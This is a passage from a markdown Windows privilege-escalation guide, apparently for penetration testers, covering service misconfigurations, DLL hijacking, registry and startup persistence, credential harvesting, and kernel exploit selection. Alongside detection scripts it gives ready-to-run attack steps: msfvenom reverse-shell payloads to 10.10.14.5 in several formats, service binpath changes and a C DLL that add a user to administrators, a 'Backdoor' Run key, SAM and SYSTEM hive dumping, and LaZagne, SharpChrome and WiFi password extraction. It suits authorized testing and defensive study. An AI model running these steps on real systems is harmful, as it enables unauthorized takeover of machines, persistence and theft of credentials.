    771 | NetworkService | Limited local access | Machine account credentials | Medium |
    772 | Custom account | Varies | Depends on account | Varies |
    773 
    774 **Service Components:**
    775 
    776 | Component | Location | Attack Vector |
    777 |-----------|----------|---------------|
    778 | Binary Path | File system | Binary replacement, DLL hijacking |
    779 | Registry Key | HKLM\SYSTEM\CurrentControlSet\Services | ImagePath modification |
    780 | Service DACL | Security descriptor | Weak service permissions |
    781 | DLL Dependencies | Various | DLL search order hijacking |
    782 
    783 ### 3.1.2 Unquoted Service Paths
    784 
    785 When a service binary path contains spaces and is not enclosed in quotes, Windows will attempt to locate the executable by trying each "break point" in the path.
    786 
    787 **Example Vulnerable Path:**
    788 ```
    789 C:\Program Files\Vulnerable Application\Sub Directory\service.exe
    790 ```
    791 
    792 **Windows Search Order:**
    793 1. `C:\Program.exe`
    794 2. `C:\Program Files\Vulnerable.exe`
    795 3. `C:\Program Files\Vulnerable Application\Sub.exe`
    796 4. `C:\Program Files\Vulnerable Application\Sub Directory\service.exe`
    797 
    798 **Detection:**
    799 
    800 ```batch
    801 :: CMD detection
    802 wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
    803 
    804 :: PowerShell detection
    805 Get-CimInstance Win32_Service | Where-Object {
    806     $_.PathName -notmatch '^"' -and 
    807     $_.PathName -match '\s' -and 
    808     $_.PathName -notmatch 'c:\\windows'
    809 } | Select-Object Name, PathName, StartMode, State
    810 ```
    811 
    812 **Exploitation:**
    813 
    814 ```powershell
    815 # Step 1: Verify write permissions to target directory
    816 icacls "C:\Program Files\Vulnerable Application"
    817 
    818 # Step 2: Check service start mode
    819 sc qc "VulnerableService"
    820 
    821 # Step 3: Generate malicious binary
    822 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o Vulnerable.exe
    823 
    824 # Step 4: Place binary in exploitable path
    825 copy Vulnerable.exe "C:\Program Files\Vulnerable.exe"
    826 
    827 # Step 5: Restart service (or wait for system reboot)
    828 sc stop VulnerableService
    829 sc start VulnerableService
    830 ```
    831 
    832 **Verification Script:**
    833 
    834 ```powershell
    835 function Find-UnquotedPaths {
    836     $services = Get-CimInstance Win32_Service | Where-Object {$_.PathName -ne $null}
    837     
    838     foreach ($service in $services) {
    839         $path = $service.PathName
    840         
    841         # Skip quoted paths
    842         if ($path.StartsWith('"')) { continue }
    843         
    844         # Skip paths without spaces
    845         if ($path -notmatch '\s') { continue }
    846         
    847         # Skip Windows directory
    848         if ($path -match '^C:\\Windows') { continue }
    849         
    850         # Extract unquoted portion (before any arguments)
    851         if ($path -match '^([^"]+\.exe)') {
    852             $exePath = $Matches[1]
    853             
    854             # Find potential hijack locations
    855             $parts = $exePath -split '\\'
    856             $testPath = ""
    857             
    858             for ($i = 0; $i -lt $parts.Count - 1; $i++) {
    859                 $testPath += $parts[$i]
    860                 if ($testPath -match '\s') {
    861                     $hijackPath = ($testPath -split '\s')[0] + ".exe"
    862                     
    863                     # Check write permissions
    864                     $parentDir = Split-Path $hijackPath -Parent
    865                     if (Test-Path $parentDir) {
    866                         $acl = Get-Acl $parentDir
    867                         foreach ($ace in $acl.Access) {
    868                             if ($ace.FileSystemRights -match 'Write|FullControl|Modify' -and 
    869                                 $ace.IdentityReference -match 'Users|Everyone|Authenticated') {
    870                                 Write-Host "[VULN] $($service.Name): $hijackPath" -ForegroundColor Red
    871                                 Write-Host "       Writable by: $($ace.IdentityReference)" -ForegroundColor Yellow
    872                             }
    873                         }
    874                     }
    875                 }
    876                 $testPath += "\"
    877             }
    878         }
    879     }
    880 }
    881 
    882 Find-UnquotedPaths
    883 ```
    884 
    885 ### 3.1.3 Weak Service Permissions
    886 
    887 Services with weak DACLs allow unprivileged users to modify service configuration.
    888 
    889 **Detection:**
    890 
    891 ```batch
    892 :: Using accesschk (Sysinternals)
    893 accesschk.exe /accepteula -uwcqv "Authenticated Users" *
    894 accesschk.exe /accepteula -uwcqv "Users" *
    895 accesschk.exe /accepteula -uwcqv "%USERNAME%" *
    896 ```
    897 
    898 **Permission Meanings:**
    899 
    900 | Permission | Code | Exploitation |
    901 |------------|------|--------------|
    902 | SERVICE_ALL_ACCESS | F | Full control - can modify everything |
    903 | SERVICE_CHANGE_CONFIG | WP | Can change binary path |
    904 | SERVICE_START | RP | Can start the service |
    905 | SERVICE_STOP | WP | Can stop the service |
    906 | WRITE_DAC | WD | Can modify service permissions |
    907 | WRITE_OWNER | WO | Can take ownership |
    908 
    909 **Exploitation with sc.exe:**
    910 
    911 ```batch
    912 :: Verify current config
    913 sc qc "VulnerableService"
    914 
    915 :: Modify binary path to add user
    916 sc config "VulnerableService" binpath= "cmd /c net localgroup administrators YOUR_USER /add"
    917 
    918 :: Restart service
    919 sc stop "VulnerableService"
    920 sc start "VulnerableService"
    921 
    922 :: Verify exploitation
    923 net localgroup administrators
    924 ```
    925 
    926 **Exploitation with PowerShell:**
    927 
    928 ```powershell
    929 # Modify service ImagePath via registry
    930 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\VulnerableService" -Name "ImagePath" -Value "C:\temp\payload.exe"
    931 
    932 # Restart service
    933 Restart-Service -Name "VulnerableService" -Force
    934 ```
    935 
    936 **Reverse Shell Payload:**
    937 
    938 ```batch
    939 :: Generate payload
    940 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe-service -o service_payload.exe
    941 
    942 :: Modify service
    943 sc config "VulnerableService" binpath= "C:\temp\service_payload.exe"
    944 sc stop "VulnerableService"
    945 sc start "VulnerableService"
    946 ```
    947 
    948 ### 3.1.4 Weak Service Binary Permissions
    949 
    950 If the service binary itself is writable, it can be replaced with a malicious executable.
    951 
    952 **Detection:**
    953 
    954 ```batch
    955 :: Check binary permissions
    956 icacls "C:\Program Files\VulnerableApp\service.exe"
    957 accesschk.exe /accepteula -quvw "C:\Program Files\VulnerableApp\service.exe"
    958 ```
    959 
    960 ```powershell
    961 # Find writable service binaries
    962 Get-CimInstance Win32_Service | ForEach-Object {
    963     $path = ($_.PathName -split '"')[1]
    964     if (!$path) { $path = ($_.PathName -split ' ')[0] }
    965     
    966     if (Test-Path $path) {
    967         $acl = Get-Acl $path
    968         foreach ($ace in $acl.Access) {
    969             if ($ace.FileSystemRights -match 'Write|FullControl|Modify' -and 
    970                 $ace.IdentityReference -match 'Users|Everyone|Authenticated') {
    971                 Write-Host "[VULN] $($_.Name): $path" -ForegroundColor Red
    972                 Write-Host "       Writable by: $($ace.IdentityReference)" -ForegroundColor Yellow
    973             }
    974         }
    975     }
    976 }
    977 ```
    978 
    979 **Exploitation:**
    980 
    981 ```batch
    982 :: Backup original binary
    983 copy "C:\Program Files\VulnerableApp\service.exe" "C:\temp\service.exe.bak"
    984 
    985 :: Replace with malicious binary
    986 copy /Y payload.exe "C:\Program Files\VulnerableApp\service.exe"
    987 
    988 :: Restart service
    989 sc stop "VulnerableService"
    990 sc start "VulnerableService"
    991 ```
    992 
    993 ### 3.1.5 Weak Service Registry Permissions
    994 
    995 The service configuration in the registry may be modifiable even if the service DACL is secure.
    996 
    997 **Detection:**
    998 
    999 ```batch
   1000 :: Check registry permissions
   1001 accesschk.exe /accepteula -kvuqsw "Authenticated Users" hklm\System\CurrentControlSet\Services
   1002 accesschk.exe /accepteula -kvuqsw "Users" hklm\System\CurrentControlSet\Services
   1003 ```
   1004 
   1005 ```powershell
   1006 # Check specific service registry permissions
   1007 $services = Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services"
   1008 foreach ($service in $services) {
   1009     $acl = Get-Acl $service.PSPath
   1010     foreach ($ace in $acl.Access) {
   1011         if ($ace.RegistryRights -match 'FullControl|SetValue' -and 
   1012             $ace.IdentityReference -match 'Users|Everyone|Authenticated') {
   1013             Write-Host "[VULN] $($service.PSChildName)" -ForegroundColor Red
   1014             Write-Host "       Modifiable by: $($ace.IdentityReference)" -ForegroundColor Yellow
   1015         }
   1016     }
   1017 }
   1018 ```
   1019 
   1020 **Exploitation:**
   1021 
   1022 ```powershell
   1023 # Modify ImagePath
   1024 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\VulnerableService" -Name "ImagePath" -Value "C:\temp\payload.exe"
   1025 
   1026 # Restart service
   1027 Restart-Service "VulnerableService"
   1028 ```
   1029 
   1030 ## 3.2 DLL Hijacking
   1031 
   1032 DLL hijacking exploits Windows' DLL search order to load malicious libraries instead of legitimate ones.
   1033 
   1034 ### 3.2.1 Windows DLL Search Order
   1035 
   1036 When an application loads a DLL without specifying the full path, Windows searches in this order:
   1037 
   1038 1. **Known DLLs**: `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`
   1039 2. **Application directory**: Directory containing the executable
   1040 3. **System directory**: `C:\Windows\System32`
   1041 4. **16-bit system directory**: `C:\Windows\System`
   1042 5. **Windows directory**: `C:\Windows`
   1043 6. **Current directory**: Process's current working directory
   1044 7. **PATH directories**: Directories in the PATH environment variable
   1045 
   1046 **Safe DLL Search Mode (default enabled):**
   1047 When enabled, the current directory is searched after system directories.
   1048 
   1049 ### 3.2.2 Finding DLL Hijacking Opportunities
   1050 
   1051 **Using Process Monitor (Procmon):**
   1052 
   1053 ```
   1054 1. Launch Procmon as Administrator
   1055 2. Set filters:
   1056    - Operation is CreateFile
   1057    - Result is NAME NOT FOUND
   1058    - Path ends with .dll
   1059 3. Run target application
   1060 4. Analyze missing DLLs in writable locations
   1061 ```
   1062 
   1063 **Automated Detection Script:**
   1064 
   1065 ```powershell
   1066 # Find applications loading DLLs from writable locations
   1067 function Find-DLLHijack {
   1068     param([string]$ProcessName)
   1069     
   1070     # Get process info
   1071     $proc = Get-Process -Name $ProcessName -ErrorAction SilentlyContinue
   1072     if (!$proc) {
   1073         Write-Host "Process not found" -ForegroundColor Red
   1074         return
   1075     }
   1076     
   1077     # Get loaded modules
   1078     $modules = $proc.Modules
   1079     
   1080     foreach ($module in $modules) {
   1081         $path = $module.FileName
   1082         $dir = Split-Path $path -Parent
   1083         
   1084         # Check if directory is writable
   1085         try {
   1086             $acl = Get-Acl $dir
   1087             foreach ($ace in $acl.Access) {
   1088                 if ($ace.FileSystemRights -match 'Write|FullControl|Modify' -and 
   1089                     $ace.IdentityReference -match 'Users|Everyone|Authenticated') {
   1090                     Write-Host "[VULN] $path" -ForegroundColor Red
   1091                     Write-Host "       Directory writable by: $($ace.IdentityReference)" -ForegroundColor Yellow
   1092                 }
   1093             }
   1094         } catch {}
   1095     }
   1096 }
   1097 ```
   1098 
   1099 ### 3.2.3 Phantom DLL Hijacking
   1100 
   1101 Some applications attempt to load DLLs that don't exist on the system. If the search path includes a writable directory, an attacker can plant a malicious DLL.
   1102 
   1103 **Common Phantom DLLs:**
   1104 
   1105 | Application | Missing DLL | Write Location |
   1106 |-------------|-------------|----------------|
   1107 | Many .NET apps | CRYPTSP.dll, CRYPTBASE.dll | Application directory |
   1108 | Office applications | Various plugin DLLs | AppData directories |
   1109 | Custom applications | Application-specific | Application directory |
   1110 
   1111 **Creating Malicious DLL:**
   1112 
   1113 ```c
   1114 // dllmain.cpp - Minimal DLL payload
   1115 #include <windows.h>
   1116 #include <stdlib.h>
   1117 
   1118 BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
   1119     switch (ul_reason_for_call) {
   1120     case DLL_PROCESS_ATTACH:
   1121         // Execute payload once when DLL is loaded
   1122         system("cmd.exe /c net localgroup administrators YOUR_USER /add");
   1123         break;
   1124     case DLL_THREAD_ATTACH:
   1125     case DLL_THREAD_DETACH:
   1126     case DLL_PROCESS_DETACH:
   1127         break;
   1128     }
   1129     return TRUE;
   1130 }
   1131 ```
   1132 
   1133 **Compiling with Visual Studio:**
   1134 
   1135 ```batch
   1136 cl.exe /LD /Fe:malicious.dll dllmain.cpp
   1137 ```
   1138 
   1139 **Using msfvenom:**
   1140 
   1141 ```bash
   1142 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f dll -o malicious.dll
   1143 ```
   1144 
   1145 ### 3.2.4 DLL Proxying/Sideloading
   1146 
   1147 DLL proxying creates a malicious DLL that forwards legitimate function calls to the original DLL while executing malicious code.
   1148 
   1149 **Steps:**
   1150 1. Identify target DLL and its exports
   1151 2. Create proxy DLL that exports same functions
   1152 3. Proxy forwards calls to renamed original DLL
   1153 4. Inject payload in DllMain
   1154 
   1155 **Using SharpDLLProxy:**
   1156 
   1157 ```batch
   1158 :: Generate proxy DLL
   1159 SharpDLLProxy.exe --dll C:\Windows\System32\version.dll --output-dir C:\temp\proxy
   1160 ```
   1161 
   1162 ## 3.3 Registry Exploits
   1163 
   1164 ### 3.3.1 AlwaysInstallElevated
   1165 
   1166 When enabled, MSI packages install with SYSTEM privileges regardless of the user running them.
   1167 
   1168 **Detection:**
   1169 
   1170 ```batch
   1171 :: Check both registry keys (both must be set to 1)
   1172 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
   1173 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
   1174 ```
   1175 
   1176 ```powershell
   1177 # PowerShell check
   1178 $hkcu = Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
   1179 $hklm = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
   1180 
   1181 if ($hkcu.AlwaysInstallElevated -eq 1 -and $hklm.AlwaysInstallElevated -eq 1) {
   1182     Write-Host "[VULN] AlwaysInstallElevated is enabled!" -ForegroundColor Red
   1183 }
   1184 ```
   1185 
   1186 **Exploitation:**
   1187 
   1188 ```bash
   1189 # Generate malicious MSI
   1190 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi
   1191 ```
   1192 
   1193 ```batch
   1194 :: Install MSI silently
   1195 msiexec /quiet /qn /i evil.msi
   1196 ```
   1197 
   1198 ### 3.3.2 Autorun Registry Keys
   1199 
   1200 **Common Autorun Locations:**
   1201 
   1202 | Registry Key | Run Context |
   1203 |--------------|-------------|
   1204 | `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` | Current user logon |
   1205 | `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` | Current user (once) |
   1206 | `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` | All users logon |
   1207 | `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce` | All users (once) |
   1208 | `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices` | Service startup |
   1209 | `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup` | Startup folder path |
   1210 
   1211 **Detection:**
   1212 
   1213 ```powershell
   1214 # Check for writable autorun entries
   1215 $autorunPaths = @(
   1216     "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
   1217     "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
   1218     "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
   1219     "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
   1220 )
   1221 
   1222 foreach ($path in $autorunPaths) {
   1223     if (Test-Path $path) {
   1224         $props = Get-ItemProperty $path
   1225         $props.PSObject.Properties | Where-Object {$_.Name -notmatch '^PS'} | ForEach-Object {
   1226             $target = $_.Value -replace '"', ''
   1227             if (Test-Path $target) {
   1228                 $acl = Get-Acl $target
   1229                 foreach ($ace in $acl.Access) {
   1230                     if ($ace.FileSystemRights -match 'Write|FullControl|Modify') {
   1231                         Write-Host "[VULN] $($_.Name): $target" -ForegroundColor Red
   1232                     }
   1233                 }
   1234             }
   1235         }
   1236     }
   1237 }
   1238 ```
   1239 
   1240 **Exploitation:**
   1241 
   1242 ```powershell
   1243 # Add malicious autorun entry
   1244 Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\temp\payload.exe"
   1245 
   1246 # Or modify existing writable binary
   1247 # (replace legitimate autorun binary with payload)
   1248 ```
   1249 
   1250 ### 3.3.3 Startup Folder Exploitation
   1251 
   1252 **Startup Folder Locations:**
   1253 
   1254 | Location | Affects |
   1255 |----------|---------|
   1256 | `C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` | Single user |
   1257 | `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` | All users |
   1258 
   1259 **Detection:**
   1260 
   1261 ```powershell
   1262 # Check startup folders
   1263 $startupPaths = @(
   1264     "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
   1265     "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
   1266 )
   1267 
   1268 foreach ($path in $startupPaths) {
   1269     Write-Host "`nChecking: $path" -ForegroundColor Cyan
   1270     $acl = Get-Acl $path
   1271     $acl.Access | Where-Object {$_.FileSystemRights -match 'Write|FullControl|Modify'} | 
   1272         ForEach-Object { Write-Host "  Writable by: $($_.IdentityReference)" -ForegroundColor Yellow }
   1273 }
   1274 ```
   1275 
   1276 **Exploitation:**
   1277 
   1278 ```batch
   1279 :: Place payload in startup folder
   1280 copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
   1281 ```
   1282 
   1283 ---
   1284 
   1285 # IV. Credential Harvesting & Secrets
   1286 
   1287 ## 4.1 File-Based Credential Discovery
   1288 
   1289 ### 4.1.1 Common Credential File Locations
   1290 
   1291 **Configuration Files:**
   1292 
   1293 | File Type | Common Locations | Content Type |
   1294 |-----------|------------------|--------------|
   1295 | web.config | `C:\inetpub\wwwroot\` | Database connection strings |
   1296 | appsettings.json | Application directories | API keys, credentials |
   1297 | .env files | Application roots | Environment variables |
   1298 | unattend.xml | `C:\Windows\Panther\` | Setup credentials |
   1299 | sysprep.xml | `C:\Windows\Panther\` | Admin password (base64) |
   1300 | .rdp files | User directories | Saved RDP credentials |
   1301 | .vnc files | User directories | VNC passwords |
   1302 | .config files | Application directories | Various credentials |
   1303 
   1304 **Search Commands:**
   1305 
   1306 ```batch
   1307 :: Search for password in files
   1308 findstr /si password *.txt *.xml *.ini *.config *.cfg
   1309 findstr /spin "password" *.*
   1310 cd c:\Users\%USERNAME%\Documents & findstr /SI /M "password" *.xml *.ini *.txt
   1311 
   1312 :: Search for specific file types
   1313 dir /s /b *pass*.txt *pass*.xml *pass*.ini *cred* *vnc* *.config
   1314 where /R C:\ *.config
   1315 where /R C:\ unattend.xml
   1316 where /R C:\ sysprep.xml
   1317 ```
   1318 
   1319 ```powershell
   1320 # PowerShell comprehensive search
   1321 $searchTerms = @("password", "passwd", "pwd", "credentials", "secret", "api_key", "apikey", "connection")
   1322 $extensions = @("*.txt", "*.xml", "*.ini", "*.config", "*.cfg", "*.json", "*.ps1", "*.bat", "*.cmd")
   1323 
   1324 foreach ($ext in $extensions) {
   1325     Get-ChildItem -Path C:\ -Include $ext -Recurse -ErrorAction SilentlyContinue | 
   1326         ForEach-Object {
   1327             $content = Get-Content $_.FullName -ErrorAction SilentlyContinue
   1328             foreach ($term in $searchTerms) {
   1329                 if ($content -match $term) {
   1330                     Write-Host "[FOUND] $($_.FullName)" -ForegroundColor Green
   1331                     $content | Select-String -Pattern $term | ForEach-Object { Write-Host "  $_" }
   1332                 }
   1333             }
   1334         }
   1335 }
   1336 ```
   1337 
   1338 ### 4.1.2 Unattend.xml and Sysprep Credentials
   1339 
   1340 **Common Locations:**
   1341 ```
   1342 C:\unattend.xml
   1343 C:\Windows\Panther\unattend.xml
   1344 C:\Windows\Panther\Unattend\unattend.xml
   1345 C:\Windows\system32\sysprep.inf
   1346 C:\Windows\system32\sysprep\sysprep.xml
   1347 ```
   1348 
   1349 **Extraction:**
   1350 
   1351 ```powershell
   1352 # Search for unattend files
   1353 Get-ChildItem C:\ -Recurse -Include unattend.xml,sysprep.xml,sysprep.inf -ErrorAction SilentlyContinue | 
   1354     ForEach-Object {
   1355         Write-Host "[FOUND] $($_.FullName)" -ForegroundColor Green
   1356         $content = Get-Content $_.FullName
   1357         # Look for password elements
   1358         $content | Select-String -Pattern "Password|AdministratorPassword|AutoLogon" -Context 0,2
   1359     }
   1360 ```
   1361 
   1362 **Decode Base64 Password:**
   1363 
   1364 ```powershell
   1365 # If password is base64 encoded
   1366 $encoded = "UABhAHMAcwB3AG8AcgBkADEAMgAzACEA"
   1367 [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
   1368 ```
   1369 
   1370 ### 4.1.3 IIS Web.config Files
   1371 
   1372 ```powershell
   1373 # Search for web.config files
   1374 Get-ChildItem -Path C:\inetpub -Include web.config -Recurse -ErrorAction SilentlyContinue | 
   1375     ForEach-Object {
   1376         Write-Host "`n[FOUND] $($_.FullName)" -ForegroundColor Green
   1377         $content = Get-Content $_.FullName
   1378         
   1379         # Extract connection strings
   1380         $content | Select-String -Pattern "connectionString|password|pwd|user id|data source" | 
   1381             ForEach-Object { Write-Host "  $_" }
   1382     }
   1383 ```
   1384 
   1385 ## 4.2 Windows Credential Manager
   1386 
   1387 ### 4.2.1 Cmdkey Enumeration
   1388 
   1389 ```batch
   1390 :: List stored credentials
   1391 cmdkey /list
   1392 ```
   1393 
   1394 **Output Analysis:**
   1395 
   1396 ```
   1397 Target: Domain:interactive=DOMAIN\Administrator
   1398 Type: Domain Password
   1399 User: DOMAIN\Administrator
   1400 ```
   1401 
   1402 **Credential Usage:**
   1403 
   1404 ```batch
   1405 :: Run command as stored user
   1406 runas /savecred /user:DOMAIN\Administrator cmd.exe
   1407 
   1408 :: Use with saved credentials
   1409 runas /savecred /user:Administrator "cmd.exe /c whoami > C:\temp\whoami.txt"
   1410 ```
   1411 
   1412 ### 4.2.2 Windows Vault
   1413 
   1414 ```powershell
   1415 # List vault credentials
   1416 vaultcmd /listcreds:"Windows Credentials" /all
   1417 vaultcmd /listcreds:"Web Credentials" /all
   1418 
   1419 # Using PowerShell
   1420 [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
   1421 $vault = New-Object Windows.Security.Credentials.PasswordVault
   1422 $vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }
   1423 ```
   1424 
   1425 ## 4.3 PowerShell Credential Storage
   1426 
   1427 ### 4.3.1 PowerShell History
   1428 
   1429 ```powershell
   1430 # Get history file path
   1431 (Get-PSReadLineOption).HistorySavePath
   1432 
   1433 # Read history file
   1434 Get-Content (Get-PSReadLineOption).HistorySavePath
   1435 
   1436 # Search for credentials in history
   1437 Get-Content (Get-PSReadLineOption).HistorySavePath | Select-String -Pattern "password|credential|secret"
   1438 
   1439 # Alternative history location
   1440 Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
   1441 ```
   1442 
   1443 ### 4.3.2 PowerShell Secure Strings
   1444 
   1445 ```powershell
   1446 # Find XML credential files
   1447 Get-ChildItem -Path C:\Users -Include *.xml -Recurse -ErrorAction SilentlyContinue | 
   1448     Where-Object { (Get-Content $_) -match "SecureString|PSCredential" }
   1449 
   1450 # Decrypt SecureString (only works for same user)
   1451 $credential = Import-Clixml -Path "C:\scripts\cred.xml"
   1452 $credential.GetNetworkCredential().Password
   1453 $credential.GetNetworkCredential().UserName
   1454 ```
   1455 
   1456 ## 4.4 SAM and SYSTEM Registry Hives
   1457 
   1458 ### 4.4.1 Checking for Backup Files
   1459 
   1460 ```batch
   1461 :: Common backup locations
   1462 dir C:\Windows\Repair\SAM
   1463 dir C:\Windows\Repair\SYSTEM
   1464 dir C:\Windows\System32\config\RegBack\SAM
   1465 dir C:\Windows\System32\config\RegBack\SYSTEM
   1466 ```
   1467 
   1468 ### 4.4.2 Volume Shadow Copy Extraction
   1469 
   1470 ```powershell
   1471 # List shadow copies
   1472 vssadmin list shadows
   1473 
   1474 # Access shadow copy
   1475 cmd /c "mklink /d C:\ShadowCopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\"
   1476 
   1477 # Copy from shadow
   1478 copy C:\ShadowCopy\Windows\System32\config\SAM C:\temp\SAM
   1479 copy C:\ShadowCopy\Windows\System32\config\SYSTEM C:\temp\SYSTEM
   1480 ```
   1481 
   1482 ### 4.4.3 Registry Save Method (Requires Admin)
   1483 
   1484 ```batch
   1485 :: Save registry hives
   1486 reg save HKLM\SAM C:\temp\SAM
   1487 reg save HKLM\SYSTEM C:\temp\SYSTEM
   1488 reg save HKLM\SECURITY C:\temp\SECURITY
   1489 ```
   1490 
   1491 ### 4.4.4 Hash Extraction
   1492 
   1493 ```bash
   1494 # Using impacket-secretsdump (on attacker machine)
   1495 impacket-secretsdump -sam SAM -system SYSTEM LOCAL
   1496 
   1497 # Using pypykatz
   1498 pypykatz registry --sam SAM --system SYSTEM
   1499 ```
   1500 
   1501 ## 4.5 Browser Credential Extraction
   1502 
   1503 ### 4.5.1 Chrome Credentials
   1504 
   1505 ```powershell
   1506 # Chrome login data location
   1507 $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
   1508 
   1509 # Check for custom dictionary (may contain passwords)
   1510 Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Custom Dictionary.txt" | 
   1511     Select-String -Pattern "password|pass"
   1512 ```
   1513 
   1514 **Using SharpChrome:**
   1515 
   1516 ```batch
   1517 .\SharpChrome.exe logins /unprotect
   1518 .\SharpChrome.exe cookies /unprotect
   1519 ```
   1520 
   1521 ### 4.5.2 Firefox Credentials
   1522 
   1523 ```powershell
   1524 # Firefox profile location
   1525 $firefoxProfiles = "$env:APPDATA\Mozilla\Firefox\Profiles"
   1526 Get-ChildItem $firefoxProfiles
   1527 
   1528 # Key files
   1529 # logins.json - Encrypted login data
   1530 # key4.db - Encryption key database
   1531 ```
   1532 
   1533 ### 4.5.3 LaZagne All-in-One
   1534 
   1535 ```batch
   1536 :: Run all credential recovery modules
   1537 .\lazagne.exe all
   1538 
   1539 :: Specific browser
   1540 .\lazagne.exe browsers -chrome
   1541 
   1542 :: Save output
   1543 .\lazagne.exe all > credentials.txt
   1544 ```
   1545 
   1546 ## 4.6 WiFi Credentials
   1547 
   1548 ```batch
   1549 :: List saved WiFi profiles
   1550 netsh wlan show profiles
   1551 
   1552 :: Show password for specific profile
   1553 netsh wlan show profile name="NetworkName" key=clear
   1554 ```
   1555 
   1556 ```powershell
   1557 # Extract all WiFi passwords
   1558 (netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object {
   1559     $profile = ($_ -split ":")[1].Trim()
   1560     $password = (netsh wlan show profile name="$profile" key=clear) | Select-String "Key Content"
   1561     if ($password) {
   1562         Write-Host "$profile : $(($password -split ':')[1].Trim())"
   1563     }
   1564 }
   1565 ```
   1566 
   1567 ## 4.7 SessionGopher for Remote Access Tools
   1568 
   1569 ```powershell
   1570 # Import and run SessionGopher
   1571 Import-Module .\SessionGopher.ps1
   1572 Invoke-SessionGopher -Thorough
   1573 
   1574 # Target specific computer
   1575 Invoke-SessionGopher -Target COMPUTERNAME
   1576 
   1577 # Supported tools:
   1578 # - PuTTY
   1579 # - WinSCP
   1580 # - FileZilla
   1581 # - SuperPuTTY
   1582 # - RDP
   1583 ```
   1584 
   1585 ---
   1586 
   1587 # V. Kernel & OS Vulnerabilities
   1588 
   1589 ## 5.1 Kernel Exploitation in 2025
   1590 
   1591 ### 5.1.1 Risk vs Reward Analysis
   1592 
   1593 **Kernel Exploitation Considerations:**
   1594 
   1595 | Factor | Consideration |
   1596 |--------|---------------|
   1597 | Stability | Kernel exploits can BSOD the system |
   1598 | Detection | Modern EDR monitors kernel behavior |
   1599 | Reliability | Exploits often version-specific |
   1600 | Necessity | Often not needed if other vectors exist |
   1601 | Client Impact | System crash = incident, potential data loss |
   1602 
   1603 **When to Use Kernel Exploits:**
   1604 - All other vectors exhausted
   1605 - System is known vulnerable and stable exploit exists
   1606 - Test environment or explicit client authorization
   1607 - Virtual machine snapshots available
   1608 
   1609 ### 5.1.2 Vulnerability Research and Exploit Selection
   1610 
   1611 **Step 1: Gather System Information**
   1612 
   1613 ```batch
   1614 systeminfo > systeminfo.txt
   1615 ```
   1616 
   1617 **Step 2: Use Windows Exploit Suggester**
   1618 
   1619 ```bash
   1620 # Update database
   1621 python windows-exploit-suggester.py --update
   1622 
   1623 # Run analysis
   1624 python windows-exploit-suggester.py --database 2025-01-01-mssb.xls --systeminfo systeminfo.txt
   1625 ```
   1626 
   1627 **Step 3: Use Watson (On-Target)**
   1628 
   1629 ```batch
   1630 .\Watson.exe
   1631 ```
   1632 
   1633 ### 5.1.3 Notable Windows Vulnerabilities (2019-2025)
   1634 
   1635 **Legacy/High Detection (Educational):**
   1636 
   1637 | CVE | Name | Affected | Notes |
   1638 |-----|------|----------|-------|
   1639 | CVE-2020-0796 | SMBGhost | Windows 10 1903/1909, Server 2019 | RCE via SMBv3 |
   1640 | CVE-2020-1472 | Zerologon | All DC versions | Domain compromise |
   1641 | CVE-2021-1675/34527 | PrintNightmare | All Windows | Print Spooler RCE |
   1642 | CVE-2021-36934 | HiveNightmare/SeriousSAM | Windows 10 | SAM file access |
   1643 | CVE-2022-21999 | SpoolFool | Windows 10/11, Server | Print Spooler LPE |
   1644 
   1645 **Modern Vulnerabilities (Check patch status):**
   1646 
   1647 | CVE | Name | Affected | PrivEsc Type |
   1648 |-----|------|----------|--------------|
   1649 | CVE-2023-36802 | StreamingLocator | Windows 11 | MSKSSRV LPE |
